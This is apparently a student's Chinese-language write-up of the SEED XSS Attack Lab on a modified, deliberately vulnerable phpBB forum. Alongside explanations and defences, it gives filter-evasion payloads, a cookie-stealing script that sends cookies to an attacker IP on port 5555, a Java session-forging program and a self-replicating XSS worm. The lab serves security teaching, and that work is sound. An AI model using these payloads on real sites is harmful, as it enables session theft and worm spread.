Cross-Site Scripting (XSS) Attack Lab phpBB Solution Seed

Cross-Site Scripting (XSS) Attack Lab phpBB

简介

跨站点脚本编写(XSS)是web应用程序中常见的一种漏洞类型。这个漏洞使得攻击者有可能注入恶意代码。进入受害者的网络浏览器。使用这个恶意代码,攻击者可以窃取受害者的凭证,比如Cookie。浏览器用于保护这些凭据的访问控制策略(即,相同的起源策略)可以通过利用XSS漏洞来绕过。这类漏洞可能会导致大规模的攻击。

为了演示攻击者利用XSS漏洞可以做些什么,我们使用phpBB建立了一个基于web的留言板。我们修改了该软件,在此留言板中引入了一个XSS漏洞;该漏洞允许用户向留言板发布任何任意消息,包括JavaScript程序。学生需要利用这个漏洞,在留言板上发布一些恶意消息;查看这些恶意消息的用将成为受害者。袭击者的目标是为受害者发布伪造的信息。

跨站脚本攻击是一种代码注入攻击,这种攻击通常涉及三个实体:攻击者被攻击用户目标网站。一般情况下,用户在目标网站的网页及用户与目标网站的交互都会被保护起来,保护方法有登录凭证、会话cookie等。攻击者要直接对这些页面或交互进行攻击比较闲难。

在XSS中,攻击者通过目标网站将其恶意代码注入受害者的浏览器。代码基本上可以做用户可以在会话内部做任何事情。

一种攻击它们的方法是向目标用户的浏览器中注入代码。把一段代码注入目标浏览器并不难。当代码来自一个被信任网站时,它可以访问和更改页面上的内容,读取属于网站的cookie并代表用户发送请求。然而,由于浏览器实施的沙盒保护机制,攻击者的代码波及不到目标网站的页面,也不能影响用户与目标网站的互动。要想实施攻去,代码必须来自目标网站。一般而言,攻击者必须找到将自己的恶意代码经由目标网站注入目标用户浏览器的方法。这类攻击称为跨站脚本攻击。如下图所示

image-20220316155312232

如果具有反射行为的网站需要用户输入,那么攻击者可以将JavaScript代码放在输入中,因此当输入反映后,JavaScript代码将从网站注入网页。

许多网站都有反射行为,也就是它们从用户那里接收输入,执行一些操作,然后向用户发送响应网页,用户的输入也被包含在响应中(即用户的输入被返回)。例如, 当用谷歌搜索一些不存在的词(如xyz)时,谷歌返回的结果页面通常包含诸如“找不到与xyZ相符的结果”的内容。可以看到,输入的xyZ被反射回来了。

如果有这种反射行为的网站没有对用户输入进行适当的处理,那么它就可能存在XSS漏洞。攻击者可以在输入中混入JavaScript代码,当输入被反射回浏览器时,JavaScript代码将被注入该网站的网页中。这正是成功的XSS攻击所必备的要素。值得注意的是,承载代码的输入必须从目标用户的计算机发出,随后藏有注入代码的网页就可以被发送给目标用户的浏览器,注入代码就能以该用户的权限来运行。

image-20220316160218104

攻击者直接将其数据发送到目标网站/服务器,将数据存储在持久存储中。如果网站稍后将存储的数据发送到其他用户,则它会在用户和攻击者之间创建一个频道。

在存储型XSsS攻击中,攻击者可以直接把数据发送给目标网站,网站会对数据迁行持入性存储。之后,如果网站将存储的数据发送给其他用户,那么它就在攻击者和其他用户之间创建了一条通道。这种通道在网络应用程序中十分普遍。

例如, 社交网站的用户主页就是这样一种通道,因为用户主页中的数据由用户自己设置,能够被很多其他用户查看。另一个例子是用户评论,它由一个用户提供,但同样能被其他人查看。

这些通道应当是数据通道,即只有数据才能通过这些通道发送。然而,用户提供的数据可以包含各种HTML标记,其中包括代码标记。这就使得用户可以在他们的输入中嵌入一段JavaScript代码。如果该输入没有被适当处理,其中的代码就会通过上述通道进入其他用户的浏览器中。该情况一旦发生,代码就会执行。对浏览器而言,这些代码就像同一页面的其他代码一样,浏览器并不知道这些代码是用户提供的还是网站提供的。因此,这些代码被赋予了与网页其他代码一样的权限。下图展示了攻击者的恶意代码如何通过目标网站进入被攻击用户的浏览器。

image-20220316160321837

XSSAttackLec

参与作者:z周周、wm

1、用IE访问某些网站的时候,输入javascript:alert(document.cookie)会有什么反应,

解释原因。

image

document.cookie可以获取本网页的cookie值,alert()方法显示一个带有消息和OK按钮的警告框。

javascript:alert(document.cookie)是一段脚本,可以让浏览器以警告框的形式弹出本页面的cookie值。

2、阅读下面两篇文章或者阅读一本书<<JavaScript DOM编程艺术>>:

Javascript Tutorial

https://www.evl.uic.edu/luc/bvis546/Essential_Javascript_--_A_Javascript_Tutorial.pdf

这篇文章介绍了Javascript语言一些基本的语法结构和注意事项,有输入输出格式、注释、变量名、算术符号、逻辑和比较运算符、if条件判断、循环等等。

一个最简单的例子,只需利用文本编辑器和浏览器就可在浏览器中显示出"Hello World

先新建一个文本文档,把文章中的代码复制进.txt文件中,再将文件后缀名更改为.html,再次点击文件就可直接跳转到浏览器中。

image

还有点击文本内容改变文本颜色和位置等。

image

image

XMLHttpRequest

http://www.w3school.com.cn/ajax/找不到了,应该是转移到了https://www.w3school.com.cn/js/js_ajax_intro.asp页面。

Ajax是可以在不刷新页面时更新网页、在页面加载后从服务器请求数据、在页面加载后从服务器接收数据、在后台向服务器发送数据的技术。其仅仅组合了浏览器内建的 XMLHttpRequest 对象(从 web 服务器请求数据)、JavaScript 和 HTML DOM(显示或使用数据)便实现了这个技术。

http://www.hunlock.com/blogs/AJAX_for_n00bs

这一篇文章看不到了。

3、了解FireFox的两个插件LiveHttpHeaders和Firebug的基本使用方法。

Live HTTP Headers

Live HTTP Headers记录浏览器和互联网之间的所有HTTP流量,可以用来:

  • 调试web应用程序
  • 遵循定向路径
  • 查看远程站点发送的cookie
  • 查看远程站点使用的web服务器
  • 查看发送到服务器的报头
  • 查看服务器返回的报头
  • 查看使用的HTTP请求方式
  • 查看响应码

image

Firedug

Firebug是一个开源的Firefox网页浏览器扩展,是一个网页开发工具,可以利用它调试、编辑、删改任何网站的CSS、HTML、DOM与JavaScript代码,现在已经停止开发,并且前去搜索会指引你下载Firefox Developer Edition。

好在Google还保留了Firebug Lite端口。Firebug Lite提供了丰富的视觉表示,当涉及到HTML元素,DOM元素和框模型阴影时,我们用于在Firebug中看到。 它还提供了一些很酷的功能,如用鼠标检查HTML元素,以及Live编辑CSS属性。

image

4、阅读下面这篇文章:

跨站脚本攻击实例解析

http://bbs.pediy.com/showthread.php?t=124209

网页显示权限不足。

5、阅读下面这几篇文章:

DOM Based Cross Site Scripting or XSS of the Third Kind

http://www.webappsec.org/projects/articles/071105.html

本文介绍了第三类跨站脚本攻击(XSS)------基于DOM的XSS攻击。典型的XSS攻击分为两种,反射性XSS和存储型XSS,这两种攻击方法都是攻击者通过目标网站将他们的代码注入到目标用户的浏览器中,而本文所介绍基于DOM的XSS则是一种不依赖于将恶意数据发送到服务器的攻击。这种攻击会对Web应用程序构成威胁,因此开发人员和站点维护人员(以及审核员)需要熟悉检测基于DOM的XSS漏洞的技术,以及防御这些漏洞的技术。

DOM型XSS主要是由客户端的脚本通过DOM动态地输出数据到页面而不是依赖于将数据提交给服务器端,而从客户端获得DOM中的数据在本地执行,因而仅从服务器端是无法防御的。

有效的防御方法有:(

  1. 避免客户端文档重写、重定向或其他敏感操作,同时避免使用客户端数据,这些操作大多数都可以通过使用动态页面(服务器端)来实现;
  2. 分析和强化客户端JS代码,特别是可能受到用户(攻击者)影响的DOM对象。

XSS (Cross Site Scripting) Cheat Sheet Esp: for filter evasion

http://80x86.io/post/xsscrosssitescriptingcheatsheetespforfilterevasion网页打不开。通过搜索找到另一网址:https://n0p.net/penguicon/php_app_sec/mirror/xss.html

本页面介绍了过滤器规避,只列出了显示底层攻击媒介,并没有展示如何减轻这些风险或如何编写攻击的实际cookie/credential 窃取部分。分为XSS(跨站脚本)、XSS 使用 HTML 引用封装、URL 字符串规避三部分

利用QQ邮箱漏洞进行钓鱼事件溯源

https://www.freebuf.com/news/85586.html

文章正在审核,还是打不开。好在有转载链接https://www.secpulse.com/archives/40443.html

本文讲述了一个由于允许加载远程可控的XML文件导致的漏洞。在解析远程xml文档生成邮件预览页时,没有严格校验输入数据,从而导致跨站的发生。

其中link标签的数据在生成邮件预览页的过程中会被readOriginalLink函数处理,readOriginalLink未对传入的参数进行任何校验,直接写入到了document对象中,导致img标签被控制,从而使本次跨站可以成功实施。

生成XSS攻击代码利用跨站漏洞钓取Cookie,有Cookie可以直接登陆。

伪装iCloud页面直接钓取账号,进而登陆,黑客伪造一个网站,将账号密码通过POST请求发送到一个远程地址。通过这个远程地址,可以找到注册是所使用的邮箱以及注册者名;而通过钓鱼页面网址可以查到另一个邮箱以及注册者名。进而继续追查犯罪嫌疑人。

令有钓鱼地址构造到ifeng.com的子域名里,为了过QQ邮箱不可信域名拦截以及各类安全软件的拦截,去借助ifeng.com白域名去跳转到真正的钓鱼页面。

6、XSS漏洞的触发条件有哪些?应该如何防范?

触发条件:

1.脚本插入

(1)插入javascript和vbscript正常字符。

例1:\<img src="javascript:alert(/xss/)">

例2:\<table background="javascript:alert(/xss/)">\</table>'/在表格中插入脚本

例3:\<img src="vbscript:msgbox("a")">

(2)转换字符类型。将javascript或vbscript中的任一个或全部字符转换为十进制或十六进制字符。

例1:\<img src="javascript:alert(/xss/)"> '/将j字符转为十进制字符j 。

例2:\<img src="javascript:alert(/xss/)"> '/将j字符转为十六进制字符j 。

(3)插入混淆字符。

在系统控制字符中,除了头部的(null)和尾部的 (del)外,其他31个字符均可作为混淆字符,比如\等字符都可插入到javascript或vbscript的头部,其中Tab符 、换行符、回车符还可以插入到代码中任意地方。

例1:<img src=" javascript:alert(/a/)"> '/插入到代码头部,其中 可写成 ,效果一样

例2:<img src="java scr ipt:alert(/a/)"> '/插入到代码中任意位置,其中 可写成

例3:<IMG SRC="jav ascript:alert('XSS')"> '/ 是回车符的16进制形式

例4:<IMG SRC="jav ascript:alert('XSS')"> '/ 是换行符的16进制形式

2.样式表

(1)利用CSS代码@import、expression触发XSS漏洞。

例1:@import "http://web/xss.css"; '导入外部带有XSS代码的CSS样式表。

例2:@import'javascript:alert("xss")'; '调用javascript脚本触发漏洞

例3:body{xss:expression(alert('xss'))} '在内部样式表中加入expression事件

例4:<img style="xss:**expression(alert("xss"))">'在内嵌样式表中加入expression事件

(2)在CSS代码中加入javascript和vbscript脚本

例1:body{background-image:url(javascript:alert("xss"))}

例2:body{background-image:url(vbscript:msgbox("xss"))}

(3)转换字符类型,以十六进制字符替换其中或全部的字符:

例1:@\0069mport:url(web/1.css);’//将其中的i转为\0069

例2:body{xss:\0065xpression(alert(‘xss’))}’//将e转换为\0065

例3:body{background-image:\0075\0072\006c…}’将url全转为16进制

(4)插入混淆字符,在css中,/**/是注释字符,除了/**/外,字符"\"和结束符"\0″也是被忽略的,可以用来混淆字符。

例1:@\0im\port’\0ja\vasc\ript:alert(“xss”)’;

例2:@\i\0m\00p\000o\0000\00000r\000000t”url”;

防范方法:

防御XSS攻击主要有两种方法,一种是设法过滤掉数据中的代码或把代码转换成数据,一种是强制开发者把代码和数据分开,再对代码部分添加约束条件。

(1)对于第一种方法,关键在于如何去除来自用户输入中的代码或使其无效。一般有两种方法:

  1. 过滤方法:即删除用户输入中的代码,开发者可使用过滤器实现从数据中过滤掉JavaScript代码。

  2. 编码方法:编码能将HTML标记进行替换表示。服务器将注入的JavaScript代码进行编码,当浏览器看到被编码的脚本后,只会将JavaScript代码显示出来,而不会执行它。

(2)对于第二种方法,关键在于将代码和数据分离开来,并设置相应规则来禁止执行来自不可信源的JavaScript代码。这可以通过内容安全策略机制(CSP)来实现。CSP是为了有效地防御XSS攻击而开发的一套机制,设置相应的CSP规则可有效地禁止恶意代码的运行,提高程序对XSS攻击的抵抗力。

7、认真观看,P3 Cross-Site Scripting Attack Lecture

https://www.bilibili.com/video/BV1a441117kb

大概说下视频的内容。

点击劫持(ClickJacking)的攻击。点击劫持是视觉欺骗,用户只看到了底层页面,与页面进行交互时却是与上层页面在交互。这是由于透明的iframe造成的,通过控制iframe的位置,导致上层页面的按钮等覆盖到下层上。

CSRF(Cross Site Request Forgery)译为跨站请求伪造。CSRF指攻击者盗用了你的身份,以你的名义发送恶意请求。 包括:以你的名义发送邮件,发送消息,盗取你的账号,甚至于购买商品,虚拟货币转账......引发个人隐私泄露以及财产安全的问题。

跨站脚本攻击 作为一种HTML注入攻击,XSS攻击的核心思想就是在HTML页面中注入恶意代码。

在XSS攻击中,一般有三个角色参与:攻击者目标服务器受害者的浏览器。 由于有的服务器并没有对用户的输入进行 安全方面的验证,攻击者就可以很容易地通过正常的输入手段,夹带进一些恶意的HTML脚本代码。当受害者的浏览器访问目标服务器上被注入恶意脚本的页面后,由于它对目标服务器的信任,这段恶意脚本的执行不会受到什么阻碍。 XSS攻击的分类:反射型XSS,存储型XSS。

SQL Injection:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

Lab

https://github.com/SKPrimin/HomeWork/tree/main/SEEDLabs/Cross-SiteScripting(XSS)AttackLab

准备工作

本实验需要在seedubuntu9上进行

启动服务器

sudo apache2ctl start
or
sudo service apache2 start

image-20220316002404941

我们查看var/www/XSS/XSSLabPhpbb下的文件。由于服务器的机制,我们可以直接加上 XSS/XSSLabPhpbb的路径访问此处。

image-20220315203036576

直接输路径相当于直接访问,这是由于主机设置。这也正是IPv4的地址。使用其他虚拟机也可以访问。

image-20220316104125479

文本传输

如果你无法安装VMtools,那么这也可以作为一种向外传递信息的方式。另一种向内传递信息的方式也是使用网络。比如可以吧所有的命令写在一篇文章中https://www.cnblogs.com/skprimin/p/16011145.html,通过网络访问。毕竟只要能联网,就有了能与外界交换信息的通道。

向外传输时,因为在本地启动了服务器,所以可以在电脑的另一个操作系统,甚至是物理机上,访问seed9的IP地址。可以将文件放在var/www/XSS文件夹下。这是可行的。

image-20220316140707054

访问网站

也可以使用网址访问 www.xsslabphpbb.com

这是因为我们已经配置了DNS,这个URL只能从虚拟机内部访问,因为我们已经修改了/etc/hosts文件来映射域名www.xsslabphpbb.com到虚拟机的本地IP地址(127.0.0.1)。也可以修改/etc/hosts,将任何域名映射到一个特定的IP地址。

账户密码均为admin、alice、bob 。

账户 密码
admin admin
alice alice
bob bob

image-20220315213432497

Task1 发布恶意消息以显示警报窗口

此任务的目标是发布一条包含JavaScript的恶意消息,以显示一个警报窗口。JavaScript应该与消息中的用户注释一起提供。以下JavaScript将显示一个警报窗口:

<script>alert('XSS');</script> 

如果您将此JavaScript与您的评论一起发布在留言板中,那么任何查看此评论的用户都将看到警报窗口。

可见我们已经登录成功。点击进入Test Forum1

随后创建一个新的topic

image-20220316084428259

输入内容

<script>alert('XSS SKPrimin');</script>

image-20220316084751135

submit提交之后,稍等几秒便会出现此警告窗。

image-20220316084846338

当再次进入此页面时也会出现弹窗,我们F12使用Firebug查看页面代码,通过搜索功能发现输入的字符串是直接嵌套在页面中的,没有进过任何过滤,甚至连简单的加上引号""都没有。这也因此使得该字符串能被当成JavaScript代码执行。

image-20220316085232640

Task2 发布恶意消息来显示cookie

此任务的目的是在包含JavaScript代码的消息板上发布恶意消息,这样,当用户查看此消息时,用户的Cookie将被打印出来。例如,考虑以下包含JavaScript代码的消息:

当用户查看此消息发布时,他/她将看到一个显示该用户Cookie的弹出消息框。

我们对Task1的内容重新编辑,在这里我们也可以发现其内容是空的,这也是由于输入的字符串被当成代码而没有显示。

image-20220316090217495

修改post内容,或者添加一个post也可。

<script>alert(document.cookie);</script>
Hello Everybody,
Welcome to this message board.

image-20220316085914356

同样是稍等几秒便会输出此弹窗

image-20220316090015661

当我们使用Firebug的net调试,重新加载页面,对某一个请求的header进行分析,便可以发现其内容正是Cookie。

image-20220316090626466

Task3 从受害者的机器里偷Cookie

在上次任务中,恶意的JavaScript代码可以打印出用户的Cookie;在此任务中,攻击者希望JavaScript代码将Cookie发送给自己。

为了实现这一点,恶意的JavaScript代码可以向攻击者发送一个HTTP请求,并将Cookie附加到请求中。我们可以通过让恶意的JavaScript插入一个<img>标签,并将src设置为攻击者目的地的URL来做到这一点。当JavaScript插入img标签时,浏览器会试图从所提到的URL加载图像,并在此过程中最终向攻击者的网站发送一个HTTPGET请求。

下面给出的JavaScript将Cookie发送到攻击者计算机上提到的端口5555。在特定端口上,攻击者有一个TCP服务器,它简单地打印出接收到的请求。TCP服务器程序将被提供给您(可在本实验室的网站上获得)。

这里我们选择另一台主机,当然使用同一台主机也是可以的,理论上只要能相互联网便可,使用ping命名可以测试相互之间是否能通信。但实际上这是一门玄学,推荐使用seedubuntu12负责监听。

获取地址

ifconfig

image-20220316091611473

攻击机seed12的id地址

image-20220316102021559

新建post

我们新建一个Topic,输入对应命令,并提交

Hello Folks,
<script>document.write('<img src=http://attacker_IP_address:5555?c='
+ escape(document.cookie) + ' >'); </script>
This script is to test XSS. Thanks.

image-20220316102209051

监听

在攻击机上创建监听端口。

nc -lv 5555

随后在seed9上刷新Task3的页面,如果服务器将其当成代码解析,那么会出现一个图片标识,这时因为我们插入的是<img src=...标签。在HTML中是照片标签,又因为其对应的src参数是不存在的,所以图片并没有显示出来。

image-20220316131545757

让其加载内容,这时,在监听端口处便会收到发送的内容。对比便会发现其内容正是cookie。

image-20220316101958281

Task4:用偷来的Cookie模仿受害者

获取参数

在窃取了受害者的Cookie后,攻击者可以对受害者的phpBBweb服务器做任何事情,包括以受害者的名字发布新消息,删除受害者的帖子,等等。在这个任务中,我们将编写一个程序来代表受害者发布一个信息帖子。

为了建立一个消息发布,我们应该首先分析phpBB在发布消息方面是如何工作的。更具体地说,我 们的目标是找出当用户发布消息时发送到服务器的内容。Firefox的LiveHTTPHeaders扩展可以帮助我 们;它可以显示从浏览器发送的任何HTTP请求消息的内容。

我们打开Live HTTP headers,此处为了减少监听到其他页面的无用信息,我们在Test Forum页面再打卡监听。

image

打开监视后,创建一个新的Topic,内容使用容易辨识的标记。

image-20220316112635056

随后查看Live HTTP headers,根据标识查找,锁定是第二个,其Content中也包含了这次的post内容。

image-20220316123425279

java模拟请求

一旦我们理解了消息发布的HTTP请求是什么样子的,我们就可以编写一个Java程序来发送相同的HTTP请求。phpBB服务器无法区分该请求是由用户的浏览器发送的,还是由攻击者的Java程序发送的。

只要我们正确地设置了所有参数,服务器就会接受并处理消息发布的HTTP请求。为了简化您的任务,我们为您提供了一个示例java程序: https://www.cnblogs.com/skprimin/p/16011145.html

import java.io.*;
import java.net.*;


public class HTTPSimpleForge {
    public static void main(String[] args) throws IOException {
        try {
            int responseCode;
            InputStream responseIn = null;

            // 要伪造的URL
            URL url = new URL("http://www.xsslabphpbb.com/posting.php");

            // 创建URLConnection实例,以进一步参数化资源请求,以后的URL实例可以表示的状态。
            URLConnection urlConn = url.openConnection();

            if (urlConn instanceof HttpURLConnection) {
                urlConn.setConnectTimeout(60000);
                urlConn.setReadTimeout(90000);
            }

            // AddRequestProperty方法用于添加HTTP标头信息。
            // 在这里,我们将用户代理HTTP标头添加到伪造的HTTP数据包中。
            urlConn.addRequestProperty("Cookie", "");

            // HTTP发布数据包括要发送到服务器的信息。
            String data = "username=admin&seed=admin%40seed.com";
            // 应该将URL连接的DOUTPUT标志设置为TRUE以发送HTTP发布消息。
            urlConn.setDoOutput(true);

            // OutputStreamWriter 字节输出流 用于将HTTP POST数据写入URL连接。
            OutputStreamWriter wr = new OutputStreamWriter(urlConn.getOutputStream());
            wr.write(data);
            wr.flush();

            // HttpURLConnection a subclass of URLConnection is returned by
            // url.openConnection() since the url is an http request.
            //因为URL是HTTP请求, HttpURLConnection 由 
            // URL.Openconnection()返回URLConnection的子类,
            if (urlConn instanceof HttpURLConnection) {
                HttpURLConnection httpConn = (HttpURLConnection) urlConn;
                // 连接Web服务器并获取HTTP响应消息的状态代码。
                responseCode = httpConn.getResponseCode();
                System.out.println("Response Code = " + responseCode);

                // HTTP状态代码HTTP_OK表示已成功收到响应。
                if (responseCode == HttpURLConnection.HTTP_OK) {
                    // 从URL连接对象获取输入流。
                    responseIn = urlConn.getInputStream();

                    // 为字节读入流BufferedReader创建一个实例,以按行读取响应行。
                    BufferedReader buf_inp = new BufferedReader(new InputStreamReader(
                                responseIn));
                    String inputLine;

                    while ((inputLine = buf_inp.readLine()) != null) {
                        //System.out.println(inputLine);
                    }
                }
            }
        } catch (MalformedURLException e) {
            e.printStackTrace();
        }
    }
}

根据Live HTTP headers所捕获的内容,进行修改主要是修改data、Cookie。其data内容事实上就是参数,在一些老网站上,使用POST传参数时,其网址后面?..&..正是参数,?表示起始,&就是参数之间的分隔符。

例如我们修改subject=message=两个参数的内容,修改为TASK4java04444SKPriminAAAAAAAA...

 String data = "subject=TASK4java04444&addbbcode18=%23444444&addbbcode20=0&helpbox=Code+display%3A+%5Bcode%5Dcode%5B%2Fcode%5D++%28alt%2Bc%29&message=SKPriminAAAAAAAAAAAAAAAA0000000000000000000000000&poll_title=&add_poll_option_text=&poll_length=&mode=newtopic&sid=c50f6a27861e00e5947e7376676e6b80&f=1&post=Submit";

将上述代码复制保存,java文件的特性,文件名必须要与类名(public class后面跟着的那个)相同,即命名为HTTPSimpleForge.java。随后我们更改部分内容将参数。

  • 上层创建的URL url = new URL("http://www.xsslabphpbb.com/posting.php");对象。

  • urlConn.addRequestProperty("Cookie", "")只需要一个Cookie。Cookie即代表所有,我们平时网站的免登录实际上也是由浏览器帮我们保存了Cookie并自动登录实现的。个别网站可能要user-agent(浏览器标识)、referer(防盗链)

  • String data = "";发送的信息

HTTPSimpleForge.java文件中对应的部分修改。URL大约再12行,addRequestProperty大约再24行,data紧跟其后。

image-20220316134708166

随后先编译再执行。响应码200表示正常。

javac HTTPSimpleForge.java
java HTTPSimpleForge

image-20220316133715317

回到Test Forum1页面,发现新增了一个post。

image-20220316133650911

内容也确实为我们所更改的

image-20220316135058661

Task 5: Writing an XSS Worm

在之前的任务中,我们已经学会了如何从受害者那里偷取饼干,然后使用偷来的饼干来伪造HTTP请求。在这个任务中,我们需要编写一个恶意的JavaScript来直接从受害者的浏览器中伪造一个HTTP请求。此攻击不需要攻击者的干预。可以实现这一点的JavaScript被称为跨站点脚本蠕虫程序。对于这个web应用程序,蠕虫程序应该执行以下操作:

  1. 使用JavaScript检索用户的会话ID。

  2. 伪造一个HTTP发布请求,以使用会话ID发布消息。

HTTP最常见的请求有两种类型,一种是HTTPGET请求,另一种是HTTPPOST请求。这两种类型的HTTP请求在向服务器发送请求内容的方式上有所不同。在phpBB中,发布消息的请求使用HTTPPOST请求。我们可以使用XMLHttpRequtd对象为web应用程序发送HTTPGET和POST请求。XMLHttpResqest只能将HTTP请求发送回服务器,而不是其他计算机,因为XMLHttpResket强制执行同源策略。这对我们来说不是一个问题,因为我们确实想使用XMLHttp请求将一个伪造的HTTPPOST请求发送回PhpBB服务器。

<script>
  var Ajax = null;
  // 构造HTTP请求的标题信息
  Ajax = new XMLHttpRequest();
  Ajax.open("POST", "http://www.xsslabphpbb.com/posting.php", true);
  Ajax.setRequestHeader("Host", "www.xsslabphpbb.com");
  Ajax.setRequestHeader("Keep-Alive", "300");
  Ajax.setRequestHeader("Connection", "keep-alive");
  Ajax.setRequestHeader("Cookie", document.cookie);
  Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  // 构建内容。 可以从LiveHttPheader学习内容的格式。 我们需要填写的只是subject, message, 和 sid
  var content = "subject=" + "XSSWorm" + ...; //这些参数事实上一个都不能少,都要有
  // 发送 HTTP POST 请求
  Ajax.send(content);
</script>

编写脚本

为了使我们的蠕虫能够工作,我们应该注意phpBB如何使用会话id信息。从LiveHTTPHeaders扩展的输出中,我们可以注意到sid在消息发布请求中出现了两次。一个是在饼干部分(它被称为phpbb2mysql sid).因此,XMLHttpRequet发送的HTTPPOST请求也必须包括Cookie。

如果我们仔细查看LiveHTTPHeaders的输出,我们可以看到相同的会话id也出现在以“主题=”开头的行中。phpBB服务器在这里使用会话id来防止其他类型的攻击(即。跨站点请求伪造攻击)。在我们伪造的消息发布请求中,我们还需要添加这个会话id信息;这个会话id的值与phpbb2mysql中的值完全相同 sid。如果请求中没有此会话id,服务器将丢弃该请求。

为了从Cookie中检索sid信息,您可能需要在JavaScript中学习一些字符串操作。

使用如下的代码即可获取32长度的sid。

var c = document.cookie;
var i = c.indexOf("sid=")
c.slice(i + 4, i + 4 + 32);

image-20220316171537760

编写脚本如下,

<script>
  var Ajax = null;
  Ajax = new XMLHttpRequest();
  Ajax.open("POST", "http://www.xsslabphpbb.com/posting.php", true);
  Ajax.setRequestHeader("Host", "www.xsslabphpbb.com");
  Ajax.setRequestHeader("Keep-Alive", "300");
  Ajax.setRequestHeader("Connection", "keep-alive");
  Ajax.setRequestHeader("Cookie", document.cookie);
  Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  var c = document.cookie;
  var i = c.indexOf("sid=");
  var content = "subject=" + "XSSWormSKPrimin" + "&addbbcode18=%23444444&addbbcode20=0&helpbox=Font+color%3A+%5Bcolor%3Dred%5Dtext%5B%2Fcolor%5D++Tip%3A+you+can+also+use+color%3D%23FF0000"+ "&message="+"This is a worm created by SKPrimin" +"&poll_title=&add_poll_option_text=&poll_length=&mode=newtopic&sid=" + c.slice(i + 4, i + 4 + 32) +"&f=1&post=Submit";
  Ajax.send(content);
</script>

发帖

由Alice登录并发帖

image-20220316175035853

切换登录,由bob查看,点击后再退出便发现Bob在不知情的情况下发了一个帖

image-20220316175122090

Task6 自我复制的Worm

在上一个任务中构建的蠕虫只代表受害者伪造信息;它不会自我传播。因此,从技术上讲,它不是一种蠕虫。为了能够自我传播,伪造的信息还应该包括一个蠕虫,所以每当有人点击伪造的信息时,就会创建一个新的携带相同蠕虫的伪造信息。这样,蠕虫就可以被传播了。点击伪造信息的人越多,蠕虫传播的速度就越快。

JavaScript代码可以通过DOM api直接从DOM获得自己的副本。

文档对象模型(DOM)方法:

  • DOM将页面的内容组织成对象树(DOM节点)。

  • 使用DOM api,我们可以访问树中的每个节点。

  • 如果页面包含JavaScript代码,它将被存储为树中的对象。

  • 因此,如果我们知道包含代码的DOM节点,就可以使用DOM api从该节点获取代码。

  • 每个JavaScript节点都可以指定一个名称,然后使用document.getElementByID() API来查找该节点。

在此任务中,您需要展开在任务5中执行的内容,并将蠕虫的副本添加到伪造消息的主体中。以下指南将帮助您完成此任务:

image

  1. 发布伪造信息的JavaScript程序已经是该网页的一部分了。因此,蠕虫代码可以使用DOMapi从网页中检索自己的副本。下面给出了一个使用DOMapi的例子。此代码获取其自身的一个副本,并将其显示在一个警报窗口中:

    <script id=worm>
    var strCode = document.getElementById("worm");
    alert(strCode.innerHTML);
    </script>
    
  1. URL编码:所有通过HTTP传输的消息都使用URL编码,即根据URL编码方案将空格等所有非ascii字符转换为特殊代码。在蠕虫代码中,要在phpBB论坛中发布的消息应该使用URL编码进行编码。

转义函数可用于对字符串进行URL编码。下面给出了一个使用编码函数的例子。

<script>
var strSample = "Hello World";
var urlEncSample = escape(strSample);
alert(urlEncSample);
</script>

3.在URL编码方案下,使用“+”符号来表示空间。在JavaScript程序中,“+”同时用于算术操作和字符串连接操作。为了避免这种歧义,您可以使用concat函数进行字符串连接,并避免使用加法。对于练习中的蠕虫代码,您不必使用附加内容。如果必须添加一个数字(例如+5),则可以使用减法(例如a-(-5))。

根据其提示我们写出对应代码。代码中所有的+都会被转义。

<script id=worm>
  scriptValue = document.getElementById("worm");
  scriptValue = scriptValue.childNodes[0].nodeValue;
  var sc1 = "<script id=worm>";
  var sc12 = sc1.concat(scriptValue);
  scriptValue = sc12.concat("<\/script>");
  scriptValue = escape(scriptValue);
  var Ajax = null;
  Ajax = new XMLHttpRequest();
  Ajax.open("POST", "http://www.xsslabphpbb.com/posting.php", true);
  Ajax.setRequestHeader("Host", "www.xsslabphpbb.com");
  Ajax.setRequestHeader("Keep-Alive", "300");
  Ajax.setRequestHeader("Connection", "keep-alive");
  Ajax.setRequestHeader("Cookie", document.cookie);
  Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  var c = document.cookie;
  var i = c.indexOf("sid=");
  var s1 = "subject=XSSSelfWorm&addbbcode18=%23444444&addbbcode20=0&helpbox=Font+color%3A+%5Bcolor%3Dred%5Dtext%5B%2Fcolor%5D++Tip%3A+you+can+also+use+color%3D%23FF0000&message=";
  var s3 = "&poll_title=&add_poll_option_text=&poll_length=&mode=newtopic&sid=";
  var s5 = "&f=1&post=Submit";
  var s12 = s1.concat(scriptValue); // 其最为关键的自我复制,即输出的内容是它自己
  var s34 = s3.concat(c.slice(i - (-4), i - (-36)));
  var s1234 = s12.concat(s34);
  var content = s1234.concat("&f=1&post=Submit");
  Ajax.send(content);
</script>

发自我复制帖

添加对应代码,并删除所有空行,换行。直至浓缩为一行。

<script id=worm>scriptValue1=document.getElementById("worm");scriptValue2=scriptValue1.childNodes[0].nodeValue;var sc1="<script id=worm>";var sc12=sc1.concat(scriptValue2);scriptValue3=sc12.concat("<\/script>");scriptValue=escape(scriptValue3);var Ajax=null;Ajax=new XMLHttpRequest();Ajax.open("POST", "http://www.xsslabphpbb.com/posting.php",true);Ajax.setRequestHeader("Host","www.xsslabphpbb.com");Ajax.setRequestHeader("Keep-Alive", "300");Ajax.setRequestHeader("Connection", "keep-alive");Ajax.setRequestHeader("Cookie", document.cookie);Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");var c=document.cookie;var i=c.indexOf("sid=");var s1="subject=XSSSelfWorm&addbbcode18=%23444444&addbbcode20=0&helpbox=Font+color%3A+%5Bcolor%3Dred%5Dtext%5B%2Fcolor%5D++Tip%3A+you+can+also+use+color%3D%23FF0000&message=";var s3="&poll_title=&add_poll_option_text=&poll_length=&mode=newtopic&sid=";var s5="&f=1&post=Submit";var s12=s1.concat(scriptValue);var s34=s3.concat(c.slice(i - (-4), i - (-36)));var s1234=s12.concat(s34);var content=s1234.concat("&f=1&post=Submit");Ajax.send(content);</script>

image-20220316224049466

切换到Bob

第一次点击Task6CCCP便会复制一个蠕虫

image-20220316224235675

接下来点击复制出来的XSSSelfWorm便会在复制出来一个新的文件,依次类推。

如果点击没反应,可能是没来得及加载数据,点进去后不要着急退出来,点一点其它的东西。

image-20220316224408476

源代码查看

